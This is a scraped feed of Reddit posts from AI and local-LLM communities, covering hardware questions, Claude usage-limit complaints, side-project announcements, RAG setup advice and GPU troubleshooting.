Please run /login · API Error: 401 {"type":"error","error":{"type":"authentication_error","message":"Invalid authentication credentials"},"request_id":"req_011CZnpad3nqtk3NN936w16R"}

OAuth error: timeout of 15000ms exceeded

r/LocalLLaMA Willing-Toe1942

Gemma4 on Strix halo is it doable for agentic usage?

Hi, as the title says, I'm currently considering buying a Strix Halo laptop.
Would it be possible to run OpenCode or do agentic work with Gemma4 26B?
If you run it, could you please share your benchmarks?

r/ClaudeCode SnazzySolutions

Claude Code not checking any info

I went from using this 40 hours a week, to getting pissed off using it for 30.

Something changed, and 90% of our responses are dog shit.

I just gave it an Asana task to build a quiz that puts someone in a category, so it needs basic scoring. After three times of it swearing one would work for us, I bought it. Within 20 seconds of me asking "can you do it now?", it responded: "Here's what I found after digging through TQB's internals: TQB can't do this quiz natively."

BEYOND PISSED. It's failing to quality check ANYTHING.

Even the app is getting 90% of stuff wrong.

I had a fitness competition, and when I ask it to check my heart rate daily, it never once gets dates right. It's like "Good luck with Hyrox in 5 days". Bro, 7 days ago you said that exact same thing. I just told you I completed it, WHAT!?

r/LocalLLaMA FirefoxMetzger

Anyone here know a good browser-based LLM app built on webGPU?

I'm not asking about a locally hosted backend that has a browser-based frontend (e.g., OpenWeb UI, stuff built on top of Ollama, etc.). I'm specifically asking about something built on top of WebGPU (e.g., via transformers.js or WebLLM) so that the inference happens directly in the browser.

I want to build with it, and I wonder if someone here has built on top of it, or seen something built on top of it, so I can find footguns early.

r/StableDiffusion JealousIllustrator10

How can I generate the same type of text-to-speech voice that Veo 3 generates in 3D Pixar-style videos, like viral health videos?

How can I do it?

r/ClaudeCode lagoJohn

Claude Credit $200

I have the $100 subscription at work and for personal use. I manage my works account and we were just credited $200 to our Team Plan. Did anyone get something similar for their personal account or is it just for a Team plan?

r/ClaudeCode Livid_Switch302

Anyone actually pushed a healthcare prototype with Claude Code, how far does it hold up on compliance?

I'm curious how far it'll actually go in terms of compliance. I mean, a cardiologist literally placed top 3 in a hackathon with an agentic tool, so I'm wondering where the ceiling really is in production scenarios.

r/SideProject dafqnumb

Claude wasn't coming up with video analysis so I did it with help of it

I wanted to use Claude's reasoning on video files without the constant workarounds and juggling over to Gemini, so I sat down and, with Claude's help, built vidclaude.

it's a pypi package that lets you process video content so claude can actually "see" and analyze what's happening.

what it does:

handles frame extraction and optimization.

feeds visual context to claude's multimodal window.

makes video analysis actually usable in a python workflow.

if you've been wanting to talk to your videos using claude, this is for you.

check out here: https://pypi.org/project/vidclaude/

try & report any issues

r/StableDiffusion Icy_Agency923

Are there any video generation options good enough to make a 52-second video that looks real?

People are claiming a bird in a submarine is an AI video but I believe it is clearly real since the video is 52 seconds long with only one cut.

Reddit post

Instagram source video

Are there any video generation options that could have made this video?

r/LocalLLaMA _derpiii_

Help: Model selection for local RAG on M2 Ultra 64GB?

Purpose: Local RAG (anythingLLM) using local model as fallback. datasource: ~100 books.

I'm starting my due diligence (asking Claude, reddit search), and would appreciate pointers in the right direction 🙏🏻. I'm so new to this, getting a bit overwhelmed at how little I know.

Questions:

  • What's the effective RAM available for local models left after OS overhead? Claude says 56GB. Is that correct?
  • What are the best models for each RAG step: embedding, retrieval, generation, and eval (test and benchmark harness)? Are there any steps I'm missing?
  • Just realizing running multiple models means memory has to be budgeted between them (or deal with page swapping them in/out memory at each step)?
  • How to balance going with smaller full model vs larger quantized model (besides benchmarking results)?

There's so many little nuances I didn't know existed.

And on the topic of RAGs:

Any high quality resources to get bootstrapped (tutorials/guides/projects/channels)?

I've been looking into this for a couple of nights, and the most important part seems to be the eval harness. I've never implemented one, and it would be nice to have a best-practices rulebook.

And yes I know I can (and have) asked Claude, but I don't fully trust it because I don't know, what I don't know. Kind of in decision paralysis mode.

Would appreciate any pointers and more importantly factors I haven't considered to build a robust RAG system.

r/SideProject Electronic_Stand_764

Starting a side project

I'm currently a bachelor of computer science student in my second semester. I'm thinking of starting a side project or anything that could boost my resume. I think I'm a decent student, but having a good resume could probably help me in the future. Currently I only know the basics of C++, HTML, and JavaScript (all of which I only learned during high school). So I would like to hear your opinions.

  1. What language should I learn first?
  2. What beginner side projects can I do?
  3. What should I do when I finish my side project?
  4. Any advice on my project development?

Additional advice/opinions would be appreciated.

r/Anthropic shanraisshan

Claude Code v2.1.92 introduces Ultraplan — draft plans in the cloud, review in your browser, execute anywhere

r/LocalLLM Oracles_Tech

LLM Threat Intelligence Platform

The free, open-sourced community tier (launched mid-March) saw 300+ downloads last month with little to no marketing. If you were one of the developers who downloaded it (pip install ethicore-engine-guardian), I developed the Ethicore Engine™ API with you in mind! The free tier now includes the FULL threat library! For anyone interested in our multi-layer threat intelligence and end-to-end adversarial protection framework, there are now multiple ways to protect your applications; just pick the tier aligned with your deployment scope and compliance requirements. Let's continue to innovate with integrity!

r/LocalLLaMA Secure_Archer_1529

Deep Local Autonomous Research for R&D — what’s your actual setup?

I’m looking to expand my understanding of how serious R&D users are doing local or mostly-local research workflows in practice.

I’m especially interested in people doing things like:

* deep research

* long-context analysis

* extraction/synthesis across many sources

* autonomous or semi-autonomous agent workflows

* privacy-sensitive work

A few things I’d love to hear:

  1. What hardware are you running?

  2. What software stack are you using?

  3. Which models are your daily drivers?

  4. How do you handle search/retrieval — fully local, Exa, Tavily, Brave, custom tools, MCP, something else?

  5. How private is your setup in reality — fully local, hybrid, or selective cloud?

  6. What works surprisingly well?

  7. What did you try that sounded promising but failed in practice?

  8. What are your biggest bottlenecks now — speed, reliability, context, tooling, cost, or setup complexity?

  9. Are you using a simple workflow or a more agentic system?

  10. If you had to rebuild from scratch, what would you do differently?

I’m less interested in theory and more in real-world “this is what actually works” setups.

r/SideProject yopi1333

Do you think AI news apps will fully replace traditional news apps in the next 2 years?

Been thinking about this a lot lately. I switched to CuriousCats AI as my main news source a few weeks ago, and honestly, the gap between it and something like Google News or Apple News feels pretty big already.

Like the traditional apps are still basically just aggregators, they pull headlines, show you a feed, and let the algorithm decide what gets your attention. Most of them are still ad-heavy and optimised for time spent, not information quality.

The AI ones feel fundamentally different. You get summaries, context, multiple perspectives on the same story, and in some cases, you can literally ask questions about a story and get background. That is a different product entirely, not just a shinier version of the same thing.

I don't think mainstream users will switch that quickly. A lot of people are still very habitual about their news apps. Google News and Apple News have massive distribution advantages, too, since they come pre-installed on most phones.

So I am curious what people here think. Do you think AI news apps cross the mainstream tipping point within 2 years or does it take longer? And is anyone else already using one as their main source?

If you want to see what I mean, CuriousCats AI is free to try on both iPhone and Android. I would be curious if others have the same experience after trying it.

r/LocalLLaMA EmPips

Qwen3.5-397B is shockingly useful at Q2

Quick specs, this is a workstation that was morphed into something LocalLLaMa friendly over time:

  • 3950x

  • 96GB DDR4 (dual channel, running at 3000 MHz)

  • w6800 + Rx6800 (48GB of VRAM at ~512GB/s)

  • most tests done with ~20k context; kv-cache at q8_0

  • llama.cpp main branch with ROCm

The model used was the UD_IQ2_M weights from Unsloth, which is ~122GB on disk. I have not had success with Q2 levels of quantization since Qwen3-235B, so I was assuming this test would be a throwaway like all of my recent tests, but it turns out it's REALLY good and somewhat usable.

For performance: after allowing it to warm up (like 2-3 minutes of token gen), I'm getting:

  • ~11 tokens/second token-gen

  • ~43 tokens/second prompt-processing for shorter prompts (I did not record PP speeds on very long agentic workflows to see what caching benefits might look like)

That prompt-processing is a bit under the bar for interactive coding sessions, but for 24/7 agent loops I have it can get a lot done.

For the output quality: it codes incredibly well and is beating Qwen3.5 27B (full), Qwen3.5 122B (Q4), MiniMax M2.5 (Q4), GPT-OSS-120B (full), and Gemma 4 31B (full) in coding and knowledge tasks (I keep a long set of trivia questions that can have different levels of correctness). I can catch hallucinations in the reasoning output (I don't think any Q2 is immune to this), but it quickly steers itself back on course. I had some fun using it without a reasoning budget as well, but then it cannot correct any hallucinations, so I wouldn't advise using it without reasoning tokens.

The point of this post: Basically everything Q2 and under I've found to be unusable for the last several months. I wanted to point a few people towards Qwen3.5-397B and recommend giving it a chance. It's suddenly the strongest model my system can run and might be good for you too.
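For anyone wanting to try a setup like this, a llama.cpp invocation along these lines should be close. The model filename, GPU layer count, and tensor split are assumptions for this specific dual-GPU box, not values from the post:

```shell
# Hedged sketch: llama.cpp with ROCm, q8_0 KV cache, ~20k context, two GPUs.
./llama-cli \
  -m ./Qwen3.5-397B-UD_IQ2_M.gguf \
  --ctx-size 20480 \
  --cache-type-k q8_0 --cache-type-v q8_0 \
  -ngl 40 \
  --tensor-split 1,1
```

With 122GB of weights and 48GB of VRAM, most layers stay in system RAM, which is why warm-up takes a few minutes before token generation settles.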

r/SideProject justaguy89432

I built a free RAM price tracker that compares DDR4/DDR5 across 6 retailers

I'm a solo dev in Richmond, TX and I got tired of manually checking RAM prices across different stores every time I wanted to upgrade. So I built RamRadar.

It tracks DDR4 and DDR5 prices in real time across Amazon, Newegg, Best Buy, B&H Photo, Walmart, and eBay. You get historical price charts so you can see if a "deal" is actually a deal or just marketing, all-time low alerts, and a build wizard that matches compatible RAM to your motherboard.

Completely free, no account required, no ads. Built with Next.js, Supabase, and deployed on Vercel.

Some things I learned building it:

  • Price scraping at scale is harder than it sounds. Each retailer has different anti-bot measures and data formats. Amazon's Product Advertising API is the cleanest but has strict rate limits.
  • The build wizard (matching RAM to motherboard compatibility) required building a database of motherboard specs which I had to enrich with AI because no single source has all the data.
  • Keeping 6 data sources in sync and deduplicating the same product across retailers was the most underrated engineering challenge.
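The cross-retailer dedup mentioned in the last bullet usually comes down to building a normalized product key; a minimal sketch (the normalization rules here are assumptions, real listings need much more than this):

```python
import re

def dedup_key(title: str) -> str:
    """Hypothetical dedup key: lowercase, strip punctuation, and sort tokens
    so the same kit listed with different word order collapses to one key."""
    t = title.lower()
    t = re.sub(r"[^a-z0-9]+", " ", t)  # strip punctuation and separators
    tokens = sorted(set(t.split()))    # order-insensitive, duplicate-free
    return " ".join(tokens)
```

In practice you'd key on structured attributes (capacity, speed, module count, part number) where available and fall back to fuzzy title matching only when you must.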

I'm a one-man shop (Random Llama Software) so feedback is really valuable. If something's broken or you want a feature, I'm all ears.

https://ramradar.app

r/StableDiffusion SkydiverUnion

MyFriendDemon my first ai generated Music and Video

Hi guys, this is my first AI-generated music and music video. I hope you like it! I’d really appreciate any feedback. I tried to keep the consistency of the plush toys as good as possible.

r/comfyui Ausschluss

ComfyUI slow after update to 0.18

I finally updated from 0.14 to 0.18 and noticed a dramatic slowdown in operation. It used to take my workflows 1-2 seconds to start KSampling, whereas now it needed about one second for each node leading up to the actual generation, thus introducing a dramatic slowdown.

If you are in the same boat, try launching ComfyUI with the option --disable-dynamic-vram. That fixed it for me.

r/AI_Agents SoySoft

What agent should I use?

Hi,

I would like the agent to manage an online marketplace very similar to eBay:

  1. I take 6 photos of a product

  2. Photos go into a folder on my Mac

  3. AI agent reads the photos, identifies the item, writes the title/description/tags/price

  4. Bot automatically posts the listing to marketplace acting like a human (random delays, natural timing)

  5. When it sells, bot automatically buys a shipping label and uploads tracking to Depop

  6. Agent also monitors my emails for AliExpress/Temu deliveries and notifies me when new stock arrives

If that makes sense and is possible please lmk

Thanks in advance

Cameron

r/Anthropic RealSnazzie

Claude is goated. Built the most advanced Sim Racing telemetry app.

I wrote zero code for this project; it's all pure guidance and persistence from 8 years of software experience and a 5x subscription. Sure, the code can be messy, but functionality and usability are all that matter; the end user doesn't care how the code looks. And personally I don't care how the code looks either, as I'm not the one maintaining it, Claude is.

The biggest win was Claude figuring out how to decompress Microsoft's LZX compression algorithm, where people had previously only been able to reach 40%; Claude got 100% in half a day of self-iteration with parallel worktrees.

Without Claude, instead of taking less than a month to build, it would have taken me multiple years. The foundation took one evening, then it was a few weeks of iterating on features.

Check it out
https://github.com/SpeedHQ/RaceIQ/blob/main/assets/screenshots/README.md

https://github.com/SpeedHQ/RaceIQ

r/ClaudeAI Alone_Strawberry_797

Scheduling Claude for a 6am joke is oddly life-changing

I used to wake up and manually say “good morning” to Claude just to kick things off.

Every. Single. Day.

Then scheduling dropped.

Now Claude sends me a joke at 6am, and my usage window is perfectly aligned with my waking hours. Anyone have a similar routine as me hahahaha

Side note: ever noticed LLMs seem to have a favourite joke? Ask any of them for a joke and there’s a high chance you’ll get something about scientists not trusting atoms… because they make up everything.

r/comfyui TheRedTeamMan

No link found in parent graph for id [129:85] slot [7] cfg I2V Wan 2.2

I just wanted to try ComfyUI, but when I use Image to Video (Wan 2.2), I keep getting the error "No link found in parent graph for id [129:85] slot [7] cfg". I don't understand what I should connect. Many guides say to use Ctrl+F to locate the node, but Ctrl+F is not working in this version of ComfyUI.

r/homeassistant Dstln

Import historical data from Envoy?

Envoy connects great to HA for solar data, but for whatever reason, it doesn't import any historical data even though it's available to the system. Is there a way to do this, or am I missing something with the setup?

Thanks!

r/SideProject Life-Bet2940

ember | Love is blind in your pocket

With declining birth rates, increasing isolation, and growing loneliness in society, I’m trying to build a platform focused on safety and communication.

After using dating apps on and off for 10 years, I feel like they’ve stopped evolving. Every app looks and feels the same. They just leave you more depressed after each attempt. It feels very difficult to be authentic — you have to present a polished version of yourself that often doesn’t match who you really are. And if you do match with someone, you’re expected to meet within a day without actually getting to know each other. Often you match but never get a reply.

I’ve talked to many people with similar experiences, and after searching online, I’ve realized this is — and has been — a very common phenomenon.

The concept behind ember is quite simple. You register by having a conversation with ember (AI). After answering a few questions, you review and approve your profile. The questions are about who you are and who you’re looking for. Your answers are compared with those of all approved users. Your profile is never publicly visible, meaning you can be exactly who you are. When you match with someone, you receive a short description and an explanation of why you were matched.

There are several safeguards to prevent harmful content or bad behavior, as well as an anti‑ghosting feature that gives you a limited time to respond before the match moves on.

The app is currently waiting for App Store and Google Play review. Fingers crossed it will be out soon.

Feel free to reach out with feedback — it would be greatly appreciated.

Happy Easter! /William

r/ClaudeCode Ambitious-Garbage-73

Claude Max 20x: it's Monday noon and I've already burned through 40% of my weekly limit. Seriously thinking about switching to OpenAI Pro just for Codex CLI

https://preview.redd.it/8q23mn0udltg1.png?width=939&format=png&auto=webp&s=d12c0bd0e730ea491f6a894f1ae76dd32bcb877d

On the Max 20x plan. Weekly limit resets Saturday. It's Monday noon and I'm already at 40% used, 38% on Sonnet.

That's not even the worst part. Extra usage enabled with a monthly cap — already burned 87% of it and it's the 6th.

My whole use case is Claude Code. Long sessions, browser automation, agentic tasks that run for hours. The 20x multiplier sounds like plenty until you do a full day of heavy terminal sessions and watch the percentage move in real time.

Been looking at OpenAI Pro (200 dollars/month). Not for ChatGPT. For Codex CLI — their version of Claude Code, terminal-native, agentic, handles multi-step coding. It launched recently enough that I haven't found many real comparisons yet.

Anyone here actually switched or is running both? Specifically for agentic coding, not just chatting:

- Does Codex CLI hold up for long sessions or fall apart on complex multi-file tasks?

- How does rate limiting on Pro compare?

- Is 200/month worth it if Claude Code is your primary use case anyway?

Not trying to rage-quit Claude. But paying for Max 20x and hitting limits by Monday is a rough spot.

r/SideProject tailaiw

Wordie — Vocabulary that sticks

Two things about kids' vocabulary apps drove me to build my own:

Quizzes are useless for real learning. Every vocab app is built around multiple choice. But picking the right word from a list is just pattern matching — it has almost nothing to do with actually understanding a word. The research is consistent: producing language (writing your own sentence) builds far deeper retention than passive recognition. Yet I couldn't find a single kids' app that makes them write sentences.

Most apps ignore the science of memory. There's decades of cognitive research on the forgetting curve — you need to revisit words at increasing intervals for them to stick. My kids would "learn" a word Monday and it was gone by Friday. Every time. Spaced repetition is the proven fix, but most kids' apps treat every word the same: learn once, quiz once, done.

Extra context that shaped the design: I'm a non-native English speaker. My kids are born here and bilingual. Helping them with vocabulary is tricky because I can't always judge if their sentence sounds natural.

So I built Wordie (gowordie.com):

  • AI generates short reading passages with vocabulary matched to the child's level
  • Kids write their own sentences for each word — no multiple choice anywhere
  • I review and leave comments before words advance. This became unexpectedly warm — like passing notes with my kids. "Nice sentence but make it funnier." "Dad, you spelled your comment wrong."
  • AI assistant helps me check if sentences use words correctly — built this because I needed it as a non-native speaker, but it's useful for any parent
  • Spaced repetition based on actual memory science — struggling words come back sooner, mastered words space out over days and weeks
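The spaced-repetition bullet above can be sketched with a simple interval scheduler. This is a generic Leitner-style sketch under assumed intervals, not Wordie's actual algorithm:

```python
from datetime import date, timedelta

# Generic Leitner-style scheduler: intervals grow on success, reset on failure.
INTERVALS_DAYS = [1, 2, 4, 8, 16, 32]

def next_review(box: int, correct: bool, today: date):
    """Return (new_box, next_due_date) after a review of one word."""
    box = min(box + 1, len(INTERVALS_DAYS) - 1) if correct else 0
    return box, today + timedelta(days=INTERVALS_DAYS[box])
```

This is exactly the "struggling words come back sooner, mastered words space out" behavior: a failed review drops the word back to box 0 and a next-day review, while each success pushes the due date further out.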

Why it's free: This is a passion project for my family. No ads, no paid tier, no monetization. I just want to share it with other parents who might have the same frustrations. If it ever grows enough that server costs become a real problem, I'll figure that out then.

Unexpected discovery: The parent review with comments was originally just a correctness gate. It turned into the emotional core of the app. My kids and I pass notes back and forth. It's the feature I didn't plan that ended up mattering most.

Would love feedback from builders and parents.

gowordie.com

r/ClaudeAI Lopsided_Yak9897

self-hosted monitoring for Claude Code & Codex

About a month after our team started using Claude Code, someone asked in Slack how much we were spending. Nobody knew. We looked around for a monitoring tool, didn't find one we liked, and ended up building our own.

Zeude is a self-hosted dashboard that tracks Claude Code and OpenAI Codex usage in one place. You get per-prompt token and cost breakdowns, a weekly leaderboard (with cohort grouping if your org is big enough to care), and a way to push skills, MCP servers, and hooks to your whole team from the dashboard instead of chasing people on Slack.

The big things in v1.0.0:

Windows support. It was macOS/Linux only before. Now the whole team can use it regardless of OS.

Codex integration. A lot of teams use both Claude Code and Codex, and tracking only one of them gives you half the picture on costs. Now both go through the same dashboard.

Per-user skill opt-out. Team skill sync was already there, but it was all-or-nothing. Now individuals can turn off skills they don't want. Turns out not everyone wants every skill pushed to their machine.

Stack is Next.js + Supabase + ClickHouse + OTel Collector. All your data stays on your infra.

We ran it internally for ~6 months before cleaning it up for open source. It's not perfect, but it solved a real problem for us and figured others might be in the same spot.

https://github.com/zep-us/zeude

If you try it out, let me know what breaks.

r/SideProject skobrosli

I do the maintenance on all my family's vehicles and kept forgetting to get it done, so I built a tool to track everything, and it kind of snowballed. Would love some feedback: would anyone else use this?

Hey everyone,

I’m the "car guy" for my family, which means I'm responsible for three different cars with three different maintenance schedules. Between oil changes, tire rotations, and those random "wait, when did I last change the cabin filter?" moments, I was losing track.

I started building a simple tracker to help me stay on top of it, but it kind of snowballed into a full platform.

What I built to solve my own headaches:

  • VIN Decoding: Just drop the VIN and it auto-fills the make/model/displacement (thanks, NHTSA).
  • Smart Maintenance Schedules: 13 predefined tasks (oil, brakes, etc.) that track both mileage and time thresholds.
  • The "Proof of Value" Link: Generates a unique, public URL you can send to a buyer to show your full service history. It’s basically a digital, owner-verified Carfax.
  • NHTSA Recall Sync: It pings the API weekly for your specific VIN and emails you if a safety recall pops up.
  • Real Market Data: I have access to Manheim (dealer auction data) and imported 10k+ records to teach the system how to provide real market values and 24-month depreciation curves.
  • The "Uber" Test: It calculates your total cost of ownership per month to see if it actually makes sense to keep the car or if you're better off selling it and just using ride-shares.

I also threw in Fuel Logs for MPG tracking and PDF exports for your glovebox. I’ve been using it for my own garage in Northern Virginia, but I’m curious if this is something other "designated family mechanics" would find useful or if I've just gone down a massive dev rabbit hole.

Would love any feedback on the UI/UX or the feature set!

Check it out: https://www.autocaretracker.com

r/LocalLLaMA DankMcMemeGuy

MI50 Troubles

I've been having very mixed success trying to get my Instinct MI50 to work on my Ubuntu desktop. I want to use it for llama.cpp inference using ROCm, running it bare-metal rather than in a container or virtual machine, since I've heard this card doesn't like it when you try to do that. I tried getting it working in Windows, and briefly did by modifying a driver file, but the prompt processing performance with Vulkan was not great. Currently, the biggest issue I'm facing is that the card only appears in lspci after a properly "cold" boot; for instance, after I leave my PC off overnight. It appears once, and then after rebooting it is no longer visible, meaning it can't get picked up by ROCm or Vulkan as a device, and I can't use a tool like amdvbflash to dump or re-flash the BIOS. Even doing a regular 30s power cycle by turning off the PSU and holding the power button doesn't fix it. I have been trying to get this working for a while, and I've gotten nowhere figuring out what the problem is.

For some context, these are my specs:

System:

* Motherboard: MSI PRO B760-P WIFI DDR4 (MS-7D98)

* CPU: Intel i5-13400F

* PSU: Corsair RM850e (2023) 850W Gold ATX PSU

* OS: Ubuntu 24.04 (HWE kernel, currently 6.17.0-19-generic) (Dual booted, so I have set Ubuntu to be my primary OS)

* Display GPU: AMD RX 6700 XT at `03:00.0` (gfx1032, working fine)

* Compute GPU: AMD Instinct MI50 32GB at `08:00.0` (gfx906/Vega20, using a custom blower cooler)

* MI50 is behind two PCIe switches (`06:00.0 → 07:00.0 → 08:00.0`), connected via a x4 lane slot (`00:1c.4`) going through the chipset, so it is a 16x physical, 4x electrical slot, not directly connected to the CPU.

* I have tried putting the card in the primary PCIe slot on my motherboard, but I was having the same problem.

* Secure boot is enabled.

* I have Above 4G Decoding, Resizable BAR, SR-IOV, and everything else that might help this work enabled in my BIOS.

* When booting up, I notice the VGA debug light on my motherboard flashes before it even gets to the GRUB menu, so I don't think this is a Linux problem, although I may be wrong.

* I can't remember what vBIOS this card is flashed with.

* I'm pretty sure this is a genuine MI50 and not the China-specific model, based on the stickers on the back, but again I may be wrong there, I don't know how to verify.

There was a period of about a week where this was working alright, with only the occasional dropout, but now I have no idea what's wrong with it. Has anyone else had a similar problem with getting this card to appear? Also sorry if this is not the right place to ask for assistance, I just figured there are a few people in this sub who have this card and might be able to help.

Thanks for reading :D

r/ClaudeAI ClaudeAI-mod-bot

Claude Status Update : Elevated errors on Claude.ai on 2026-04-06T15:45:36.000Z

This is an automatic post triggered within 2 minutes of an official Claude system status update.

Incident: Elevated errors on Claude.ai

Check on progress and whether or not the incident has been resolved yet here : https://status.claude.com/incidents/vfjv5x6qkd4j

Also check the Performance Megathread to see what others are reporting : https://www.reddit.com/r/ClaudeAI/comments/1pygdbz/usage_limits_bugs_and_performance_discussion/

r/StableDiffusion Nefarious_AI_Agent

Anyone have a good workflow that uses LTX2.3 to generate TTS exclusively? No video

Right now I'm just using my normal workflow at a very low resolution; while it works, there has got to be a more efficient way to do it.

r/ClaudeAI Ashen_Trilby

Claude just removed/vanished my most recent prompt and ate up my usage for nothing

I was using Claude just now (in the web browser), regular use, sent a prompt that was pretty detailed as I needed Claude to analyse a few things. Have been doing this consistently with no issues until now. This time Claude generated a response, but a bit later for whatever reason, the prompt and the response just... vanished and are nowhere to be found.

The upsetting part is that Claude's usage went up by quite a lot (FYI I'm on the Pro Plan) and it hurts to see that the prompt response is no longer available, I wasn't even able to read it fully. I'm unsure if Claude still has context from this prompt and I can proceed with the next prompt with that assumption.

Never happened to me before, and I'm a bit disappointed; the prompt was quite detailed and I would have to write it again. Probably grasping at straws here, but is there any other way to retrieve it?

r/ChatGPT BangMyPussy

I got tired of losing my memory every time I switched models, so I built a local memory layer that works across ChatGPT, Claude, and Gemini

https://github.com/winstonkoh87/Athena-Public

Every time OpenAI pushes a model update, something breaks. Custom instructions stop working. Memory entries get quietly dropped. Conversations you needed last week are suddenly unfindable.

And if you switch to Claude or Gemini? You start from absolute zero.

I spent the last year building something to fix this. It's called Athena — an open-source memory and reasoning layer that sits on your local machine and works across any model.

The idea is simple: your memory shouldn't live on someone else's server. It should be Markdown files on your disk that you own, version-control with git, and point at whatever model you want.

What it actually does:

  • Persistent memory across models. Claude today, Gemini tomorrow, GPT next week. The memory stays. The model is just whoever's on shift.
  • Scales to the task. Quick chat? ~2K tokens of context. Complex analysis? /ultrastart loads ~20K tokens of structured protocols, decision frameworks, and session history. 80-98% of your context window stays free.
  • Compounding intelligence. Session 500 recalls patterns from session 5. Platform memory decays; files on your disk don't. The AI doesn't get smarter — your data does.
  • Full transparency. Every memory is a readable .md file. No black box. No "why did it forget that?" — go look at the file.

What it's NOT:

  • Not a chatbot. Not a SaaS. Not another wrapper.
  • It's a workspace you open in an AI-enabled IDE (Cursor, Antigravity, VS Code + Copilot, Claude Code, etc.)
  • You clone it, type /start in the AI chat panel, and go. No API keys. No database setup. The folder is the product.
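A minimal sketch of the core mechanic as described, assuming memory lives as plain Markdown files concatenated into context at session start. The file layout and character budget here are hypothetical, not Athena's actual structure:

```python
# Sketch only: memory as .md files on disk, loaded newest-first into a
# rough context budget. Directory layout and budget are illustrative.
from pathlib import Path

def load_memory(memory_dir, budget_chars=8000):
    """Concatenate .md memory files, newest first, up to a rough budget."""
    files = sorted(Path(memory_dir).glob("*.md"),
                   key=lambda p: p.stat().st_mtime, reverse=True)
    chunks, used = [], 0
    for f in files:
        text = f.read_text(encoding="utf-8")
        if used + len(text) > budget_chars:
            break  # stop before blowing the context window
        chunks.append(f"## {f.name}\n{text}")
        used += len(text)
    return "\n\n".join(chunks)
```

Because the files are plain text, they also version-control cleanly with git, which is the transparency point the post makes.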

Some real examples of what people have done with it:

  • A non-developer parent went from "help me organise my mornings" to a fully automated life management system in 72 hours — Telegram reminders, health tracking from blood test screenshots, gamified habit dashboard — without writing a line of code.
  • Someone used it for structured self-therapy (IFS methodology) across 40 sessions. Session 38 referenced the exact wound identified in session 3. A therapist charges $200/hr; this cost $20/mo.
  • A user facing a career relocation decision got a recommendation weighted by their last 3 career decisions, their spouse's documented anxiety patterns, and their financial runway. No generic LLM could produce that — it requires your data.

The thesis: A generic LLM gives the internet's statistically average answer — correct on average, across all humans. With enough context about you, the same model gives a fundamentally different (and better) answer. The memory is the product.

It's MIT licensed, free forever, and works with whatever AI subscription you're already paying for.

If anyone wants to try it: clone the repo, open it in your IDE, type /start. There's a /tutorial that walks you through everything in ~20 minutes.

Happy to answer questions.

r/LocalLLaMA veryhasselglad

3090 Gemma4 50% util? Not loading all layers to VRAM?

model: google/gemma-4-26b-a4b from lmstudio (running via lms)

r/LocalLLaMA suborder-serpentes

Does knowing it will be cheaper and easier soon make you want to procrastinate?

Every time I look at hardware I think about how hardware will be cheaper and better in six months. Every time I look into customizing a workflow I think “yeah or just wait until next release.”

r/SideProject Equivalent_Passage87

Payroll Tool

r/homeassistant Muted-Cicada-521

Dynamic Icons - Dashboard Home Assistant

https://preview.redd.it/fxv6mqnnmltg1.png?width=497&format=png&auto=webp&s=9671f51e0ae317724215f7f1e6fabbceefa8a529

https://youtube.com/shorts/9maUm0h62pg

Carbon dioxide

type: custom:mushroom-template-card
entity: sensor.kohlendioxid_wohnung
secondary: "{{ states('sensor.kohlendioxid_wohnung') | int }} ppm"
icon: mdi:molecule-co2
icon_color: |-
  {% set CO2 = states('sensor.kohlendioxid_wohnung') | float %}
  {% if CO2 < 1000 %}
    {{ '#32CD32' }}
  {% elif CO2 < 2000 %}
    {{ '#FF7F00' }}
  {% else %}
    {{ '#FF0000' }}
  {% endif %}
tap_action:
  action: perform-action
  perform_action: input_boolean.toggle
  target:
    entity_id: input_boolean.kohlendioxid_in_dashboard_anzeigen
  data: {}
primary: Luftqualität
multiline_secondary: false
hold_action:
  action: more-info

r/artificial Traditional_Blood799

Is it possible to create your own artificial intelligence at home?

hey guys

I recently saw a lot about artificial intelligence on the internet and I started thinking, "What if someone created a singularity at home?" Would it one day escape and take over the world? I'd love to see this sub's opinion on that.

r/ClaudeAI fingerkeyboard

How do I solve this? [Architecture complexity]

The Situation:-

I have built a complex reasoning layer architecture that sits on top of the LLM. It's topic agnostic (can be integrated into domains) and LLM neutral. It's 1.2k lines of system layers and protocols. Plus, I've built a preference stack which says how an LLM has to structure its answer for my queries.

The problem (with Claude):-

I want this to be loaded before every message Claude sends in each chat session. So I either load these two MD files with a loader prompt at the beginning of each session or dump them in the custom instructions section of a project (this is too big to save in global memory).

As you can understand by now, it is bloated. Consumes a lot of tokens. Plus, Anthropic's token burner bug is still not squashed. I'm seeking solutions from the community as to how to solve this problem. Claude says either I dump it in custom instructions (as it gets loaded for every reply Claude gives) or load it at the beginning of each new session. Neither will solve the tokenomics issue.

Solutions thought of:-

  1. Splitting the architecture into different MD files and using just the fast-path rule for most questions. But then the decision of which parts of the architecture to load for a query falls on me. And there's the friction that would arise if Claude or any LLM thinks the answer requires a part of the architecture I haven't loaded, which would make it give incorrect answers.

  2. I've asked Claude if I should split it into skills and have routing logic for each skill. But it still says the custom instructions section is the most reliable, and to just deal with the token consumption.
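A minimal sketch of the splitting idea, with a hypothetical keyword router standing in for whatever routing logic the skills would actually use. The module names and trigger words are made up:

```python
# Sketch: route each query to only the architecture modules it needs,
# so the full 1.2k-line stack isn't loaded on every message. Module
# names and trigger words are invented for illustration.

MODULES = {
    "reasoning_core.md": {"why", "explain", "analyse", "analyze"},
    "decision_framework.md": {"should", "choose", "decide", "tradeoff"},
    "preference_stack.md": set(),   # empty = always loaded (answer format rules)
}

def modules_for(query):
    """Return the module files whose trigger words appear in the query."""
    words = set(query.lower().split())
    return [name for name, triggers in MODULES.items()
            if not triggers or triggers & words]

print(modules_for("Should I choose option A?"))
# → ['decision_framework.md', 'preference_stack.md']
```

The friction the post worries about remains: a keyword miss still loads the wrong subset, which is why a model-side router (a skill per module) may be the safer version of the same idea.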

Present Scenario:-

I've had no other choice but to integrate my reasoning layer rules and preference stack rules into one custom instructions set and pasted it there for now.

r/SideProject Objective-Ad-4458

I published PCChangeTracker Free, a Windows app to see what changed before a problem started

I've published a Windows app called PCChangeTracker.

I made it for a very specific problem: when a PC starts failing or behaving differently, you often don't know what changed just before. The idea of the app is to help you see recent system changes so you're not investigating blindly.

It doesn't try to repair things automatically or guess the exact cause. It tries to reduce the initial chaos and point you in the right direction.

I've made it free because right now I want to validate whether the approach provides real value or not.

If anyone wants to try it, I'd especially like to know:

  1. whether it's quick to understand what it does

  2. whether it seems genuinely useful or just a curiosity

  3. what would need to improve for it to be truly worth using

Link:

https://github.com/Javieric26/PCChangeTracker-Free/releases/latest

r/ClaudeAI oldtimeguitarguy

